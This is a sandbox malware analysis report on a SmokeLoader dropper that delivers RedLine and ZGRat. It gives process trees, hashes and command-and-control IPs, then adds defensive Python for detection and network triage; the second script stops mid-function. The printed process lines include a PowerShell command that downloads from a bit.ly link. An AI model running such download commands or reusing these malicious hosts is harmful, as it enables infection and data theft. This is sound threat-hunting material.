Malware Analysis Report

2025-03-15 05:17

Sample ID: 231218-1962eadfeq
Target: 0x00310000000142c9-42.dat
SHA256: 2b3edccf5deb78e43bf9267a60f85b096b25f15cf6bd1c83c56404d7fe0e7dda
Tags: smokeloader redline livetraffic up3 backdoor infostealer trojan zgrat rat
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral1 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral2 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

Score: 10/10
SHA256: 2b3edccf5deb78e43bf9267a60f85b096b25f15cf6bd1c83c56404d7fe0e7dda
Threat Level: Known bad

The file 0x00310000000142c9-42.dat was found to be: Known bad.

Malicious Activity Summary

Tags: smokeloader redline livetraffic up3 backdoor infostealer trojan zgrat rat

Reading the static pass and both detonations together: the submitted file is the SmokeLoader stage (flagged by the static scan and in both runs). It opens and enumerates HKLM\SYSTEM\ControlSet001\Enum\SCSI, fetches further PE files, writes them to randomly named executables under %TEMP% (6D44.exe and 8161.exe on Win7; A539.exe, B15F.exe, BDA5.exe and C288.exe on Win10), launches them and deletes itself; the dropped executables are written into by PID 1200 (Win7) and PID 3492 (Win10), which the report does not tie to a named image. 6D44.exe (Win7) and A539.exe (Win10) are the same file, SHA256 eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01, so that hash is a stable second-stage indicator; ZGRat is detected only in the Win10 run. Follow-on payloads arrive from bitbucket.org (bbuseruploads.s3.amazonaws.com), github.com (objects.githubusercontent.com) and, on Win10, a bit.ly link fetched with powershell Invoke-WebRequest; these are legitimate services and are hunting context rather than block candidates. The bare-IP connections (185.215.113.68:80, 5.42.65.125:80, 5.42.64.35:80 and 91.92.254.7:80 on port 80, and 77.105.132.87:17066 on a non-standard TCP port) are the network indicators specific to this sample. The installer chain (InstallSetup9.exe, BroomSetup.exe, tuc3.exe, toolspub2.exe) ends on Win10 with stdbutton.exe installed under C:\Program Files (x86)\StdButton and run with -s, alongside a schtasks /Query and the Task Scheduler COM API signature.

ZGRat

RedLine

RedLine payload

Detect ZGRat V1

Smokeloader family

SmokeLoader

Downloads MZ/PE file

Executes dropped EXE

Deletes itself

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Unsigned PE

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2023-12-18 22:22

Signatures

Smokeloader family

smokeloader

Unsigned PE

Analysis: behavioral1

Detonation Overview

Submitted: 2023-12-18 22:22
Reported: 2023-12-18 22:24
Platform: win7-20231215-en
Max time kernel: 28s
Max time network: 89s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"

Signatures

RedLine

infostealer redline

RedLine payload

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Deletes itself

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6D44.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8161.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
(62 further rows with every field N/A omitted)

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1200 wrote to memory of 2676 (4 events) N/A N/A C:\Users\Admin\AppData\Local\Temp\6D44.exe
PID 1200 wrote to memory of 2828 (4 events) N/A N/A C:\Users\Admin\AppData\Local\Temp\8161.exe

PIDs 1200, 2676 and 2828 are the processes behind the memory/1200-1, memory/2676-* and memory/2828-* dumps in the Files section; the Processes listing itself carries no PIDs, so the report does not say which image PID 1200 is.

Processes

Image | Command line
C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | "C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"
C:\Users\Admin\AppData\Local\Temp\6D44.exe | C:\Users\Admin\AppData\Local\Temp\6D44.exe
C:\Users\Admin\AppData\Local\Temp\8161.exe | C:\Users\Admin\AppData\Local\Temp\8161.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe | "C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe | C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\tuc3.exe | "C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

The listing is flat: it carries no PIDs and no parent links, and toolspub2.exe appears twice because two process instances ran. The only cross-process relation the report pins down is the WriteProcessMemory pairing above (PID 1200 into 6D44.exe and 8161.exe).

Network

Country Destination Domain Proto
RU 185.215.113.68:80 185.215.113.68 tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp
RU 5.42.65.125:80 5.42.65.125 tcp
RU 77.105.132.87:17066 tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 64.185.227.156:80 api.ipify.org tcp

Files

memory/1792-0-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1792-2-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1200-1-0x0000000002620000-0x0000000002636000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6D44.exe

MD5 9a747219c8fab73e2ba0541e3d86cd8b
SHA1 0723a7c85108ebd6a8141a7ce2459c35add81a0c
SHA256 eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01
SHA512 acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83

memory/2676-14-0x00000000000E0000-0x0000000000132000-memory.dmp

memory/2676-19-0x0000000074B70000-0x000000007525E000-memory.dmp

memory/2676-20-0x0000000005090000-0x00000000050D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8161.exe

MD5 93fbe8d58f4b01f59ca937652e31eaf2
SHA1 7a2174923e079927b7958c470936cac5a3531fb0
SHA256 36dcb91a2e2d215b994d8c186bc9b700256f89dbeb8755174c7d9c9783a72375
SHA512 2779d74c5b7421614b97c5ca5bf89480836b99480d4d4097412f7927f1eaac39ecf2a3ccf31d5466245af7940a329c6df95019c117ee917ba2a11378b38b19cf

C:\Users\Admin\AppData\Local\Temp\8161.exe

MD5 444e16aca6430bd81d9b2a8c5ec03d3a
SHA1 4bace67150714c7f6fb39964185662e9663c84c9
SHA256 5da975f37bedf34090ed8c9af159b28f4d558528c230125f323ee8d330198d2c
SHA512 f6593ff9cb2c03465e70aa6ca12fe44610e3f2fc7d2867129c9cbfb461d304930b5836eb700fe015673b0e6662ef821d1219caacafe1bec06e3dfc733b808581

memory/2828-28-0x0000000074B70000-0x000000007525E000-memory.dmp

memory/2828-29-0x0000000001390000-0x0000000002182000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 3df75168773632c0b0b22c30b563fa6b
SHA1 f49f2893fd05ddac2665a62dfb9c539404888db9
SHA256 5bf6ef91f77ca28072e79145fd8483c86ec17cd4af0debd2b10f940c65ed9046
SHA512 faced7e2e524001d0568dfab1e858ac209fb39a771cc08bd7a3000231a041bf0467f4ce9c114d451f865b4b892b30ff83b27cc1fc0148a0bcf8e74d47b84f521

\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 42bfc03dfd92f38837a93cd1a7192b6b
SHA1 a36cd5b921198419392305d49e084acc955eb1e0
SHA256 466b5a3c0c047dcf7612403a928023b31854a70afa808af03c369f56e4c459b4
SHA512 d718f343222cb52f5b379803f4a16563a2c09ad1aa47e2a2e0576cef9750463e5479decb1f82aabf5d0dd521120f2c25336c011c423f042ae19240439e928d6a

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 c5721320a24fc417b6ab31aad35d0da8
SHA1 4b458495005bff7ccbecbab9f7c8e5db79fe6ad6
SHA256 34735b52225a58c4f1a19ed55cc22cc267b05210b266a0c30f73e399a2f7d95d
SHA512 61cdf3b744300c23dd4ad8999b905dba0a6bbbc0fa5d5dc5832edc776f7f38ef2456887c79744eed8556510bc53c2a4de4a269560dde517fd735a7c70b8a46f6

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 069ac54873a7f27472c62e1b734446e8
SHA1 cc4ba2ac2ea326c4e5cdae2ac47c49635505a6d1
SHA256 124db1665fb3498b6625a9a76cf82ebd68a9fdfd5ea09d14abb8c80cc1d74469
SHA512 12a94740b795a1b23a83e0dd12c47d1ed97c7a0a6f2edb20594aec15a008d021981bf23be09d11f77b443bc13ae15d35fc7912b7f9af324dfbccda38e8f7c409

\Users\Admin\AppData\Local\Temp\nsy8289.tmp\Math.dll

MD5 ebd8a7a5042ae1d4ce1aa9071859c851
SHA1 ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6
SHA256 fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837
SHA512 daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 9293f28345f77d324f8c5a350ecd2b63
SHA1 7c7af60ce86f784c7dd257533c6002da05d06a08
SHA256 aec0b7efe1eefbfda2f68bda142e363c43c649b032554de1e9c6a41b6b357c88
SHA512 b194208dce9aae37153a7b13ea946e1a69250662debd162abd363282dcb3fc99a280b19d57d8ab278af54d399b52c3e6525ed299ce08c51a9c75cc323fe6fe87

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 0f44ea4f7ad14d998b7995caac6c2a39
SHA1 c937d2e9c7105f2c26b164e6d98a307fc4147f50
SHA256 717ac8c5dcdecebc3cb37198e925ee1bf767be39fef80dea42b4c569c5f0f96e
SHA512 0c5b91ab16276318b43dbb7406d71f69d7d41c1032e5f73fc4e46561c42c52bf8cf06c31acbc44dad425903a27b95e4dc0935eabcc23ee16342e61d00078e0ef

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 9aba4f6b81fe111b7cbf15e91f0da3d2
SHA1 dc2a1547a638e43c6a3359402ede56defd44907a
SHA256 b9400948c1c53b4e882a7adab23b6841421da4245cf6875977367368b67043df
SHA512 9a99128bce8f29103d0d6d381d2739ae778bf0023c04188d0db32e8c9a8873bc8af15b67730c2b4ad2578c8c58767682bdf8cf6e43fa571e8147e084d40fcb0e

memory/1628-62-0x00000000028B0000-0x0000000002CA8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 2415122607d4c35b75a99e934603fb0e
SHA1 8989b358c502064a1ac244862687684928c06413
SHA256 f544d8ba4ae2545f65c834a87dc48ee08528e613ccd7b68d7905deb90b682b2a
SHA512 cffc9a761d142c77fba266643e0b918160c53ddcf891a7dc9958703f36b4c34a52dcc845f663d398dd3e08f4f41415e418d9fae1026de07866508791531a4cf9

memory/3004-83-0x0000000000400000-0x0000000000418000-memory.dmp

memory/1196-90-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2712-89-0x00000000001D0000-0x00000000001D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 5f4a6709ed76a8e46881c084ba7e3f65
SHA1 fe435c6fda11c05e5fa32eaedf22b7aeb833a794
SHA256 64bf7af1c4e33f0ca7dd8a2dac5743956e1903521a520e5d9d52658edd6461fd
SHA512 189d6c1dfc02d562b6de657146e8983fb7895f5a640142c70859d5c1bc33ac14be3ff8d41997851b86c3b0b86f76d228df0a1f20cf9157311953b0ad146a497f

memory/1196-87-0x0000000000400000-0x0000000000409000-memory.dmp

\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 de3284b901a049a0ca33686ae77fd32c
SHA1 1e5dc486693f88920bf28b11ab3f2c5c23d73219
SHA256 54629baee0d279a7173e2d8b9b2e94d6f6d705b2aca5c621a271236b12d33e6c
SHA512 d01514aee820061d3bf4936b374b22815ff0163b454b1dd7d558c3b0845e47264cd4f8a7ca0e99096bf115a974182e5fb2df0bd84bc714608f16b71df6b1d81e

memory/2808-85-0x0000000000220000-0x0000000000229000-memory.dmp

memory/1196-82-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1628-91-0x00000000028B0000-0x0000000002CA8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 6496de51be7184118203296edfa03c31
SHA1 cd5abb9a399c6e595c5bf5ce1674a34db9b8cb14
SHA256 af8cfa093cad3953ecc9b6e7d9c7a36bc9bd7f204745c2a0efb2a4c065dd579a
SHA512 7a21eceb52e4826ecf8fab7b4a7d8566752392de4a5ee7ab5f720b24a0015320761e62408d4525b786385c0e691701dc132cf8732e6cb5ff431aed9b5c3933fd

memory/1628-92-0x0000000002CB0000-0x000000000359B000-memory.dmp

memory/2828-80-0x0000000074B70000-0x000000007525E000-memory.dmp

memory/2808-79-0x0000000000A00000-0x0000000000B00000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 62b01ec4a955eab3a7a41e2c07f18913
SHA1 48d8e1e391fa078d78e2130481f9d35eb45a11ec
SHA256 c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56
SHA512 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56

memory/1628-93-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 0860f85ceba2964798afaa67206d6a8c
SHA1 e84c18900c0fc2fae4ea844603aa51f195aa4654
SHA256 ec48f9dcce8e579a87d95577f129a823be2b522ce4f400e6b967fab302f3d22e
SHA512 bb12f2a10fa43a5159ed4d04ffb5e8a9299d6b7800ed4daf8ef8180a69c34553a8af4cd4f82d623793c8b267ce84f758dd1d020a1c1121943f9df14ee719dc49

\Users\Admin\AppData\Local\Temp\nsy8289.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

Analysis: behavioral2

Detonation Overview

Submitted: 2023-12-18 22:22
Reported: 2023-12-18 22:24
Platform: win10v2004-20231215-en
Max time kernel: 32s
Max time network: 66s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"

Signatures

Detect ZGRat V1

RedLine

infostealer redline

RedLine payload

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Deletes itself

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\A539.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A
(62 further rows with every field N/A omitted)

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3492 wrote to memory of 700 (3 events) N/A N/A C:\Users\Admin\AppData\Local\Temp\A539.exe

PIDs 3492 and 700 are the processes behind the memory/3492-1 and memory/700-* dumps in the Files section; the Processes listing itself carries no PIDs.

Uses Task Scheduler COM API

persistence

Processes

Image | Command line
C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe | "C:\Users\Admin\AppData\Local\Temp\0x00310000000142c9-42.exe"
C:\Users\Admin\AppData\Local\Temp\A539.exe | C:\Users\Admin\AppData\Local\Temp\A539.exe
C:\Users\Admin\AppData\Local\Temp\B15F.exe | C:\Users\Admin\AppData\Local\Temp\B15F.exe
C:\Users\Admin\AppData\Local\Temp\BDA5.exe | C:\Users\Admin\AppData\Local\Temp\BDA5.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe | "C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe | C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\tuc3.exe | "C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\SYSTEM32\cmd.exe | cmd.exe /c install.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"
C:\Users\Admin\AppData\Local\Temp\is-6NLTA.tmp\tuc3.tmp | "C:\Users\Admin\AppData\Local\Temp\is-6NLTA.tmp\tuc3.tmp" /SL5="$501FC,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\C288.exe | C:\Users\Admin\AppData\Local\Temp\C288.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\SysWOW64\schtasks.exe | "C:\Windows\system32\schtasks.exe" /Query
C:\Program Files (x86)\StdButton\stdbutton.exe | "C:\Program Files (x86)\StdButton\stdbutton.exe" -s

The listing is flat: it carries no PIDs and no parent links, and toolspub2.exe appears twice because two process instances ran. The only cross-process relation the report pins down is the WriteProcessMemory pairing above (PID 3492 into A539.exe). The install.bat run by cmd.exe is the one dropped to IXP000.TMP (see Files), and the powershell line fetches a bit.ly link; schtasks /Query and stdbutton.exe -s under Program Files (x86) are the tail of the installer chain.
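The process list above is flat, so the behaviours the report flags (WriteProcessMemory into a dropped child, the Enum\SCSI read, the cmd.exe to powershell download, schtasks, the Program Files install) have to be re-derived from events. The following is an added example of that rule logic, not part of the original report and not Triage's detection code. The command lines are copied from the Processes section and the PID pair 3492 to 700 from the WriteProcessMemory table; the other PIDs, every parent/child link except that pair, and the list of URL shorteners are assumptions for the example. Rule names mirror the report's signature names where one exists.

```python
"""Rule logic over sandbox-style events, run on a constructed event list.

Added example: command lines come from this report's behavioral2 Processes
section and the PID pair 3492 -> 700 from its WriteProcessMemory table. All
other PIDs and parent/child links are assumptions (the report prints no
process tree). Rule names mirror the report's signatures where one exists.
"""
import re
from dataclasses import dataclass

TEMP = r"C:\Users\Admin\AppData\Local\Temp"
SAMPLE = TEMP + r"\0x00310000000142c9-42.exe"
URL_RE = re.compile(r"https?://([^/'\"\s]+)/", re.IGNORECASE)
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "is.gd", "cutt.ly"}  # assumption: common shorteners


@dataclass
class Event:
    kind: str                 # "process", "write_memory" or "reg_open"
    pid: int
    image: str = ""           # image of the acting process
    cmdline: str = ""
    parent_image: str = ""    # assumed except for 3492 -> 700
    target_pid: int = 0
    target_image: str = ""
    key: str = ""


EVENTS = [
    Event("process", 3492, SAMPLE, f'"{SAMPLE}"'),
    Event("reg_open", 3492, SAMPLE, key=r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI"),
    Event("process", 700, TEMP + r"\A539.exe", TEMP + r"\A539.exe", parent_image=SAMPLE),
    Event("write_memory", 3492, SAMPLE, target_pid=700, target_image=TEMP + r"\A539.exe"),
    # parent assumed: install.bat is dropped to IXP000.TMP and cmd.exe follows 31839b57...exe in the list
    Event("process", 9001, r"C:\Windows\SYSTEM32\cmd.exe", "cmd.exe /c install.bat",
          parent_image=TEMP + r"\31839b57a4f11171d6abc8bbc4451ee4.exe"),
    Event("process", 9002, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell -Command \"Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'\"",
          parent_image=r"C:\Windows\SYSTEM32\cmd.exe"),
    Event("process", 9003, r"C:\Windows\SysWOW64\schtasks.exe",
          r'"C:\Windows\system32\schtasks.exe" /Query', parent_image=TEMP + r"\toolspub2.exe"),
    Event("process", 9004, r"C:\Program Files (x86)\StdButton\stdbutton.exe",
          r'"C:\Program Files (x86)\StdButton\stdbutton.exe" -s', parent_image=TEMP + r"\tuc3.exe"),
]


def in_temp(path: str) -> bool:
    return "\\appdata\\local\\temp\\" in path.lower()


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, detail) pairs in event order."""
    findings = []
    for e in events:
        if e.kind == "write_memory" and in_temp(e.image) and in_temp(e.target_image):
            findings.append(("Suspicious use of WriteProcessMemory",
                             f"PID {e.pid} {basename(e.image)} -> PID {e.target_pid} {basename(e.target_image)}"))
        elif e.kind == "reg_open" and e.key.lower().endswith("\\enum\\scsi") and in_temp(e.image):
            # Enum\SCSI lists disk device IDs; malware reads it to look for VM vendor strings
            findings.append(("Checks SCSI registry key(s)", f"{basename(e.image)} read {e.key}"))
        elif e.kind == "process":
            img, parent = basename(e.image), basename(e.parent_image)
            low = e.cmdline.lower()
            if img == "cmd.exe" and "/c" in low and in_temp(e.parent_image):
                findings.append(("Batch script launched by %TEMP% binary", f"{parent} -> {e.cmdline}"))
            if img == "powershell.exe" and "invoke-webrequest" in low:
                m = URL_RE.search(e.cmdline)
                host = m.group(1).lower() if m else "?"
                rule = "PowerShell download cradle" + (" via URL shortener" if host in SHORTENERS else "")
                findings.append((rule, f"{parent} -> powershell fetching {host}"))
            if img == "schtasks.exe" and in_temp(e.parent_image):
                findings.append(("Scheduled task interaction from %TEMP% binary", f"{parent} -> {e.cmdline}"))
            if e.image.lower().startswith("c:\\program files") and in_temp(e.parent_image):
                findings.append(("Dropped binary executed from Program Files", f"{parent} -> {e.image}"))
    return findings


def rule_names(events):
    return [rule for rule, _ in detect(events)]


if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"[{rule}] {detail}")
```

The rules key on where the acting or parent image lives rather than on file names, since the dropped names (A539.exe, 6D44.exe) are random per run; the `in_temp` check is what carries over to a different detonation of the same loader.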

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 16.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
RU 185.215.113.68:80 185.215.113.68 tcp
US 8.8.8.8:53 68.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 52.217.73.60:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
US 8.8.8.8:53 60.73.217.52.in-addr.arpa udp
RU 77.105.132.87:17066 tcp
US 8.8.8.8:53 87.132.105.77.in-addr.arpa udp
RU 5.42.65.125:80 tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 4.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 64.185.227.156:80 api.ipify.org tcp
US 8.8.8.8:53 156.227.185.64.in-addr.arpa udp
BG 91.92.254.7:80 91.92.254.7 tcp
US 93.184.216.34:443 tcp
US 52.165.165.26:443 tcp
RU 5.42.64.35:80 tcp
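The Network tables of behavioral1 and behavioral2 mix three kinds of rows: abused legitimate services (bitbucket.org, github.com and their storage backends), the api.ipify.org external-IP lookup, and bare-IP endpoints with no hostname at all. The following is an added example, not part of the original report, that parses rows in exactly the printed layout (the Domain column is blank on some rows) and separates what can be blocked outright from what is only hunting context. The NETWORK_ROWS text is constructed from the two tables above; which hosts count as shared hosting, sandbox noise or an IP-lookup service is an assumption of the example.

```python
"""Bucket this report's Network rows into blockable vs. shared infrastructure.

Added example, not part of the original report. NETWORK_ROWS is constructed
from the behavioral1 and behavioral2 Network tables (Country Destination
Domain Proto; Domain is blank on some rows, exactly as printed). The host
sets below are assumptions for the example.
"""
import ipaddress

NETWORK_ROWS = """\
RU 185.215.113.68:80 185.215.113.68 tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
RU 5.42.65.125:80 5.42.65.125 tcp
RU 77.105.132.87:17066 tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 64.185.227.156:80 api.ipify.org tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 68.113.215.185.in-addr.arpa udp
US 52.217.73.60:443 bbuseruploads.s3.amazonaws.com tcp
DE 140.82.121.4:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
RU 5.42.65.125:80 tcp
BG 91.92.254.7:80 91.92.254.7 tcp
US 93.184.216.34:443 tcp
US 52.165.165.26:443 tcp
RU 5.42.64.35:80 tcp
"""

# Assumptions: the services the report flags as abused legitimate hosting, the
# external-IP lookup it names, and one Win10 background host treated as noise.
SHARED_HOSTING = {"bitbucket.org", "bbuseruploads.s3.amazonaws.com",
                  "github.com", "objects.githubusercontent.com"}
IP_LOOKUP = {"api.ipify.org"}
SANDBOX_NOISE = {"g.bing.com"}


def parse_row(line):
    parts = line.split()
    if len(parts) == 4:
        country, dest, domain, proto = parts
    elif len(parts) == 3:              # Domain column blank
        country, dest, proto = parts
        domain = ""
    else:
        raise ValueError(f"unexpected row: {line!r}")
    ip, port = dest.rsplit(":", 1)
    ipaddress.ip_address(ip)           # raises on a malformed address
    return {"country": country, "ip": ip, "port": int(port), "domain": domain, "proto": proto}


def classify(row):
    d = row["domain"]
    if row["port"] == 53 and row["proto"] == "udp":
        return "dns-ptr" if d.endswith(".in-addr.arpa") else "dns"
    if d in SANDBOX_NOISE:
        return "noise"
    if d in SHARED_HOSTING:
        return "shared-hosting"
    if d in IP_LOOKUP:
        return "external-ip-lookup"
    if d == row["ip"]:
        return "direct-ip"             # contacted by literal IP, no DNS name at all
    if d == "":
        return "unresolved"            # sandbox printed no name; TLS to an IP or OS traffic
    return "other"


def triage(text):
    """Map bucket -> list of 'ip:port/proto', de-duplicated on (ip, port, proto, domain)."""
    buckets, seen = {}, set()
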